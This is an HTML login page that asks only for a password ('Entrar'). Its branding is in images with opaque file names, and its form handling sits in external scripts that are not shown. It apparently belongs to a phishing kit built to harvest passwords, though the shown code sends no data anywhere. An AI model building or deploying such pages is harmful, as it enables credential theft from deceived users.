<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/fride-select.css">
    <script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    
    
        <div>
            <div class="upto">
                <div class="upto">
                    <img src="./img/hoddfcc.JPG" alt="">
                </div>
            </div>
        
        
            <div class="container">
                <div class="container">
          
          
          
                    <form method="post" id="pg2">
                      
                        <div class="group">  
                            <img id="hiddenImage" class="img1 img01" src="./img/inpoi2.JPG" alt="">    
                            <input type="text" id="secreto" required placeholder="">
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label for="">Password</label>
                        </div>
                            
                        
                        
        
                        <button type="submit">Entrar</button>
                        <div class="inder">
                            <img src="./img/inderbtn.JPG" alt="">
                        </div>
                    </form>
                        
                   
                   
                    
                  </div>
            </div>
        </div>
        </div>

    
    <script src="./js/stb.js"></script>
    <script src="./js/inp.js"></script>
    <script>
        
    </script>
</body>
</html>